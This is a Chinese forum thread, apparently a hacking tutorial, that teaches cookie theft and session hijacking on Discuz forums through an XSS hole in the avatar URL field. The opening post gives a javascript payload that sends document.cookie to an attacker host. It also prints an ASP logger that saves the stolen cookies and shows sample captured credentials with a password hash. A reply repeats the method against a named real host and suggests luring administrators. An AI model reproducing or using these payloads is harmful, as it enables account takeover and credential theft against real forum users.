返回列表 发帖

关于跨站脚本攻击和cookie 欺骗的简单运用

我来给大家详细说明一下什么是cookie 欺骗,下面我用www.8da.cc 这个论坛做试验 此论坛用的是Discuz! 2.0 的php 论坛,存在严重的漏洞。 什么是cookie 呢。其实很简单。我们可以把cookie 看成是一个私人抽屉,里面放的都是一些你的私人文件,每一个需要cookie 的网站都会在你的硬盘上设置一个属于该网站的私人抽屉。以便你下次再访问该网站的时候,可以节省时间。 我们既然需要cookie 欺骗,那么当然首先要得到用户放在自己硬盘上的cookie 文件。如何得到呢,可以通过一些 攻击脚本去偷取。。8da.cc 这个星际论坛,对于用户定义的头像,没有做任何过滤和验证,我们可以从头像入手,把攻击脚本嵌在自己的头像里面。 更改自己的基础资料,在选择头像的时候,填入如下代码: javascript:window.open('http://www.xxxxx.com/test.asp?'+document..cookie) http://www.xxxxx.com/test.asp 这个文件的作用就是把收集来的cookie 写入一个文本文件。具体代码,我在后面付上。 然后去随便发个帖子,^_^,最后名字取得有点轰动效应的。保证看的人多。这样 每个看到你头像的人,都不自觉的 打开了 http://www.xxxxx.com/test.asp 这个页面。然后他的cookie 就被你记录到了一个文本文件里面。 收集到的资料格式如下: 1065671488; bbuserid=8489; bbpassword=fe055d7ebdd990d62cf3274aded3deec; _discuz_styleid=7; oldtopics= 104403 23222 104401 104363 104321 104399 104349 _cookietime=2592000; lastvisit=1068797580; TZ1=0; TZ2=3; _discuz_user=V`shadow.hattie; _discuz_pw=fe055d7ebdd990d62cf3274aded3deec; sid=owXVgKR6 大多数都是垃圾代码,只有2 条有用。 _discuz_user=xxxxxxx _discuz_pw=fe055d7ebdd990d62cf3274aded3deec; 呵呵,一条是用户名,一条是密码,^_^,当然密码是经过md5 加密的,不能直接拿来用。 到目前为止,我们已经完成了跨站脚本攻击的全部过程。。下面。。开始进行cookie 欺骗。 去网络上面随便下载一个cookie 查看器。我用的是 iecv1.5???????.exe 打开搜索www.8da.cc 呵呵,看到了什么,你自己的cookie 。里面也有两条: _discuz_user=yyyyyyy _discuz_pw=fe055d7ebdd990d62cf3274aded3d324 下面就是楼主所谓的高难度 ,需要较专业知识,对普通用户不太合适的 cookie 欺骗技术的具体实施 把你收集到的 _discuz_user和 _discuz_pw 替换你原来保存的cookie 。ok。选择重新打开网站。。你看到了什么。哈哈,你用你收集来的帐号已经成功登陆了。^_^。over。这就是cookie欺骗技术。。。 付上 test.asp 文件的具体代码,cookies.txt 和 test.asp 都放在你自己的空间的同一层目录里面。然后定期去看 cookies.txt 就能每天收获一大堆的用户名和id。。 <% testfile=Server.MapPath("cookies.txt") msg=Request.QueryString("bblastvisit")&"
" set fs=server.CreateObject("scripting.filesystemobject") set thisfile=fs.OpenTextFile(testfile,8,True,0) thisfile.WriteLine(""&msg& "") thisfile.close set fs = nothing %> 呵呵,如果你能把我发的内容照着做一边,那么你就是cookie 欺骗高手了。

关于跨站脚本攻击和cookie 欺骗的简单运用

呵呵!我把他的帖子做个补充!如下: 孤独浪子 de 无敌攻略之——图穷匕现 各位观众打扰你们一点时间,首先我要说明本文是参考各类资料加上自己的一点点心得写的,请高手多多提出批评 :) 前段时间,由于黑鹰论坛有点小漏洞,也就是头像漏洞,此漏洞危害很多未即使打补丁的论坛,还好经过一段时间的思考,还是弄OK了,好,现在废话少说,进入正题! 首先第一步,先在某论坛申请一个ID号(真TMD的废话)然后将图象的URL地址改为一个自动蹦出又自动隐藏的窗口。而这个窗口中的php脚本的功能就是获取你的Cooie。 先将以下脚本保存在记事本中: 然后保存为heidan.php文件,这脚本的目的就是获取论坛登陆用户的COOKIE的,将本PHP脚本传到自己的网站空间中,地址为http://cntale.51.net/heidan.php 将以上脚本上传OK后在论坛的头像地址中输入如下代码:是不是有点麻烦啊:( javascript:windows.open('http://cntale.51.net/heidan.php?'+documents.cookie)写好了后提交,现在你就成功一半了,恭喜你! 这时候,你就在论坛上狂发帖子(注:没人看就没办法),只要那倒霉鬼浏览你的帖子他登陆论坛时产生的Cookie就会保存在一个叫heidan.txt的文件。嘿嘿,大家明白了不?好,要是我想得到管理员的Cookie就简单了,就发个叫《求助管理员》这样的帖子我想没几个斑竹不愿意看 :) Cookie欺骗一直是各网迷的痛病我给大家介绍个工具IeCookiesview,专用来欺骗小羔羊的东东。 再次进入论坛,用我刚才申请的ID在登陆论坛的时候选择将密码保存一天,当然也可选择更久。 进入论坛后,打开正在工作的IeCookiesview,按F5键刷新,看到了什么?一个叫glx.yao2.com的项目,它就是刚才截取的对方论坛人员Cookie。 不好意思,本文暂时先写到这,由于碰到几个老朋友必须去哈酒,下次继续 :)

TOP

关于跨站脚本攻击和cookie 欺骗的简单运用

哈  可以啊  哪天试试

TOP

关于跨站脚本攻击和cookie 欺骗的简单运用

如果现在你们两位已经在海岸线也这么做了  那我的COOKIE 你们也会看到了

TOP

关于跨站脚本攻击和cookie 欺骗的简单运用

试着做过,但是没有成功!

TOP

关于跨站脚本攻击和cookie 欺骗的简单运用

思路不错…

TOP

关于跨站脚本攻击和cookie 欺骗的简单运用

哈,正在找关于这样的文章呢,再好好琢磨哈,谢谢!

TOP

关于跨站脚本攻击和cookie 欺骗的简单运用

说到这个~~我佩服LCX!

TOP

关于跨站脚本攻击和cookie 欺骗的简单运用

路过,佩服,佩服

TOP

返回列表 回复 发帖